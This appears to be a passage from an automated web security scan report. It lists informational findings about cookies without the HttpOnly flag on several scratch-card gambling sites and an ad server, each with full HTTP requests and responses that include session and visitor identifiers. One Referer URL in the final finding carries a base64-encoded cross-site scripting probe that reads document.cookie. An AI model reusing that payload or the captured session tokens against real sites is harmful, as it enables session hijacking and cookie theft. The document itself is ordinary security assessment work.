The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.126. http://home.okscratchcards.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Promotions.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Promotions.aspx?&mmi=15538 HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=15538&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 12:14:38 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37519


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.127. http://home.okscratchcards.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40913


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.128. http://home.okscratchcards.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.129. http://home.okscratchcards.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97807


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.130. http://home.okscratchcards.com/help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.131. http://home.okscratchcards.com/visit.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /visit.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?csi=20&LNG=~ENG& HTTP/1.1
Host: home.okscratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.okscratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=80613129.885970471.1305546061.1305546061.1305546061.1; __utmc=80613129; __utmb=80613129.1.10.1305546061

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:04 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ASP.NET_SessionId=a4hnfa45jaet4yaah01vnr55; path=/; HttpOnly
Set-Cookie: CSI_20=EncryptedUniqueVisitorID=100D72CCED40B0AE0CA3B783BDAC6CB7&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 11:41:04 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: UniqueVisitorID=100D72CCED40B0AE0CA3B783BDAC6CB7; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Vary: Accept-Encoding
Content-Length: 131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



12.132. http://it.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0zlhnt55momsyp55ncyjqa55; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:25 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: UniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.133. http://it.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vfoiefqow3k4oyvyuuo5pp45; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=CD543190925D81437E19D693AEB6F08F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: UniqueVisitorID=CD543190925D81437E19D693AEB6F08F; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44753


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.134. http://it.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qheiwe45dbfxdf55gz1vhzbv; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=78BEC340FC10D9F146C48FE864AF9956&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:39:07 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: UniqueVisitorID=78BEC340FC10D9F146C48FE864AF9956; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45146


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.135. http://it.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ukpfhp45vzrewmabzwaz4dvm; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=36EAF86AF0B3D8CA912430DC4C3017B0&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 11:58:46 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: UniqueVisitorID=36EAF86AF0B3D8CA912430DC4C3017B0; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45177


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.136. http://m.xp1.ru4.com/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad?_o=1807966&_t=17210472&_c=17210403&_b=17210472&ssv_c3=Y&ssv_b=c3&ssv_1=285952721 HTTP/1.1
Host: m.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/285952721/direct;wi.300;hi.250/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrwXH9h3RTc7hO4b2lAfr4vmUCfjo9tQBiKHvmxzyn-b8AwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0yODY3NzEzMTkzOTYyOTk2sgEQd3d3Lm1ldGFjYWZlLmNvbboBCjMwMHgyNTBfYXPIAQnaAWhodHRwOi8vd3d3Lm1ldGFjYWZlLmNvbS9mcGxheWVyLz80NzAyZCUyMiUzRSUzQ3NjcmlwdCUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklM0Mvc2NyaXB0JTNFYmU5NmEyM2YzYTM9MZgCsgXAAgHIAubpuAvgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2eoAwH1AwAAAITgBAGABpG6trfLsvz3Sw%26num%3D1%26sig%3DAGiWqtx_Iomlu9mCZTvmsPS82Ewo2V9C3Q%26client%3Dca-pub-2867713193962996%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT%2526redirectURL%253D
Cookie: X1ID=AA-00000001931708427; M62795-52786=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:11 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-length: 0
Pragma: no-cache
Set-cookie: 17210403-B17210472=6|17210476|0|0|0|17210467|17226289|-1; domain=.ru4.com; path=/
Set-cookie: O1807966=256; domain=.ru4.com; path=/; expires=Mon, 16-Nov-2012 08:52:11 GMT
Set-cookie: C17210403=0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Set-cookie: P1807966=c3N2X2MzfFl8MTMwNTU1MDMzMXxzc3ZfYnxjM3wxMzA1NTUwMzMxfHNzdl8xfDI4NTk1MjcyMXwxMzA1NTUwMzMxfA==; domain=.ru4.com; path=/; expires=Mon, 16-Nov-2012 08:52:11 GMT
Location: http://http.content.ru4.com/images/pixel.gif
